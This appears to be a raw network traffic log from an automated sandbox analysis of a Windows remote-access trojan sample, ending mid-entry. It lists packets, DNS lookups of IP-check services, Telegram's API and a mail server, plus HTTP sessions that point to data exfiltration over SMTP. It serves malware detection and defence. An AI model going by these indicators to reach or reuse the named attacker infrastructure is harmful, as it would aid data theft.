                                                                                                                                                                    Nov 7, 2024 06:20:22.027508020 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.027775049 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.070625067 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.094459057 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.139333010 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.463103056 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.463198900 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.463253021 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.469649076 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.474281073 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:22.479046106 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.160422087 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.165481091 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.165508986 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.165597916 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.165841103 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.165855885 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.176645994 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.187103033 CET49758443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.187125921 CET44349758188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.187189102 CET49758443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.187414885 CET49758443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.187428951 CET44349758188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.198426008 CET44349758188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.206957102 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:23.211827040 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.561839104 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.563152075 CET49763443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.563177109 CET44349763188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.563242912 CET49763443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.563541889 CET49763443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.563556910 CET44349763188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.574599028 CET44349763188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.575437069 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.575472116 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.575745106 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.575745106 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.575777054 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.617516041 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.184844971 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.184952974 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:27.186398983 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:27.186410904 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.186695099 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.195014000 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:27.239331961 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.333988905 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.334095955 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.334142923 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:27.334678888 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:27.338623047 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.339941978 CET4976580192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.343849897 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.343904972 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.344732046 CET8049765193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.344803095 CET4976580192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.344877005 CET4976580192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.349620104 CET8049765193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.349837065 CET8049765193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.351560116 CET4976680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.356381893 CET8049766193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.356460094 CET4976680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.356549025 CET4976680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.361315012 CET8049766193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.361447096 CET8049766193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.364866018 CET4976780192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.369792938 CET8049767193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.369852066 CET4976780192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.369955063 CET4976780192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.374703884 CET8049767193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.374862909 CET8049767193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.375596046 CET4976880192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.380482912 CET8049768193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.380536079 CET4976880192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.380649090 CET4976880192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.385441065 CET8049768193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.385586977 CET8049768193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.388842106 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.393670082 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.393733978 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.393840075 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.398575068 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.053877115 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.057765007 CET49770443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.057794094 CET44349770188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.057873011 CET49770443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.058195114 CET49770443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.058207035 CET44349770188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.073259115 CET44349770188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.074331045 CET49771443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.074356079 CET44349771188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.074479103 CET49771443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.074704885 CET49771443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.074718952 CET44349771188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.090410948 CET44349771188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.096179962 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:29.103669882 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.254576921 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.256329060 CET49772443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.256369114 CET44349772188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.256433010 CET49772443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.256805897 CET49772443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.256820917 CET44349772188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.273308039 CET44349772188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.274797916 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.274832010 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.274950981 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.275135994 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.275150061 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.305022001 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:29.891060114 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.891182899 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.893037081 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.893047094 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.893328905 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.894804001 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.935332060 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.034693956 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.034811020 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.034881115 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:30.035612106 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:30.056965113 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.058048010 CET4977480192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.062016964 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.062087059 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.062908888 CET8049774193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.062995911 CET4977480192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.063080072 CET4977480192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.067859888 CET8049774193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.068007946 CET8049774193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.068568945 CET4977580192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.073329926 CET8049775193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.073420048 CET4977580192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.074259043 CET4977580192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.079225063 CET8049775193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.080868006 CET8049775193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.083643913 CET4977680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.088432074 CET8049776193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.088524103 CET4977680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.088620901 CET4977680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:30.093381882 CET8049776193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.774023056 CET8049776193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.775407076 CET49778443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:30.775437117 CET44349778188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.775815964 CET49778443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:30.775815964 CET49778443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:30.775846958 CET44349778188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.820637941 CET4977680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:31.380464077 CET44349778188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:31.382781029 CET49778443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:31.382802010 CET44349778188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:31.528011084 CET44349778188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:31.528131008 CET44349778188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:31.528239965 CET49778443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:31.528912067 CET49778443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:31.550292969 CET49779443192.168.2.4149.154.167.220
                                                                                                                                                                    Nov 7, 2024 06:20:31.550344944 CET44349779149.154.167.220192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:31.550419092 CET49779443192.168.2.4149.154.167.220
                                                                                                                                                                    Nov 7, 2024 06:20:31.550884008 CET49779443192.168.2.4149.154.167.220
                                                                                                                                                                    Nov 7, 2024 06:20:31.550904989 CET44349779149.154.167.220192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:31.562689066 CET44349779149.154.167.220192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:31.563541889 CET49780443192.168.2.4149.154.167.220
                                                                                                                                                                    Nov 7, 2024 06:20:31.563572884 CET44349780149.154.167.220192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:31.563662052 CET49780443192.168.2.4149.154.167.220
                                                                                                                                                                    Nov 7, 2024 06:20:31.563879967 CET49780443192.168.2.4149.154.167.220
                                                                                                                                                                    Nov 7, 2024 06:20:31.563890934 CET44349780149.154.167.220192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:31.574423075 CET44349780149.154.167.220192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:35.248466015 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:36.912873030 CET4977680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:37.668466091 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:37.673372030 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:37.673474073 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:38.977483034 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:38.977859974 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:38.982817888 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:39.375009060 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:39.375202894 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:39.380090952 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:39.773428917 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:39.774081945 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:39.779046059 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:40.176932096 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:40.176949978 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:40.176968098 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:40.176980019 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:40.177215099 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:40.199421883 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:40.204592943 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:40.596642971 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:40.601865053 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:40.606741905 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:40.998785019 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:40.999978065 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:41.004878998 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:41.397006989 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:41.397479057 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:41.404337883 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:41.803052902 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:41.803764105 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:41.808677912 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:42.200512886 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:42.200781107 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:42.205621958 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:42.609728098 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:42.610025883 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:42.614846945 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:43.195749044 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:43.196548939 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:43.196618080 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:43.196647882 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:43.196677923 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:20:43.205082893 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:43.205248117 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:43.205305099 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:43.205415964 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:43.607415915 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:43.648823023 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:22:17.138176918 CET497832525192.168.2.4205.147.111.116
                                                                                                                                                                    Nov 7, 2024 06:22:17.143033981 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:22:17.535531044 CET252549783205.147.111.116192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:22:17.539705992 CET497832525192.168.2.4205.147.111.116

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Nov 7, 2024 06:20:06.716852903 CET6084753192.168.2.41.1.1.1
                                                                                                                                                                    Nov 7, 2024 06:20:06.723737001 CET53608471.1.1.1192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:21.396397114 CET6465453192.168.2.41.1.1.1
                                                                                                                                                                    Nov 7, 2024 06:20:21.404567957 CET53646541.1.1.1192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:31.541201115 CET5177753192.168.2.41.1.1.1
                                                                                                                                                                    Nov 7, 2024 06:20:31.549523115 CET53517771.1.1.1192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:37.075808048 CET5903853192.168.2.41.1.1.1
                                                                                                                                                                    Nov 7, 2024 06:20:37.667145014 CET53590381.1.1.1192.168.2.4

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Nov 7, 2024 06:20:06.716852903 CET192.168.2.41.1.1.10xd53Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:21.396397114 CET192.168.2.41.1.1.10xdf57Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:31.541201115 CET192.168.2.41.1.1.10xb289Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:37.075808048 CET192.168.2.41.1.1.10xa192Standard query (0)mail.rasextraders.comA (IP address)IN (0x0001)false

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Nov 7, 2024 06:20:06.723737001 CET1.1.1.1192.168.2.40xd53No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:06.723737001 CET1.1.1.1192.168.2.40xd53No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:06.723737001 CET1.1.1.1192.168.2.40xd53No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:06.723737001 CET1.1.1.1192.168.2.40xd53No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:06.723737001 CET1.1.1.1192.168.2.40xd53No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:06.723737001 CET1.1.1.1192.168.2.40xd53No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:21.404567957 CET1.1.1.1192.168.2.40xdf57No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:21.404567957 CET1.1.1.1192.168.2.40xdf57No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:31.549523115 CET1.1.1.1192.168.2.40xb289No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:37.667145014 CET1.1.1.1192.168.2.40xa192No error (0)mail.rasextraders.comrasextraders.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Nov 7, 2024 06:20:37.667145014 CET1.1.1.1192.168.2.40xa192No error (0)rasextraders.com205.147.111.116A (IP address)IN (0x0001)false

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                                                    • checkip.dyndns.org

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.449733193.122.130.0807176C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 7, 2024 06:20:06.783490896 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Nov 7, 2024 06:20:16.748151064 CET730INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:16 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 547
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Request-ID: cad3cb60f65a3c51abd08489fccfb8ff
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                                                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.449736193.122.130.0807556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 7, 2024 06:20:10.725902081 CET151OUTGET / HTTP/1.1
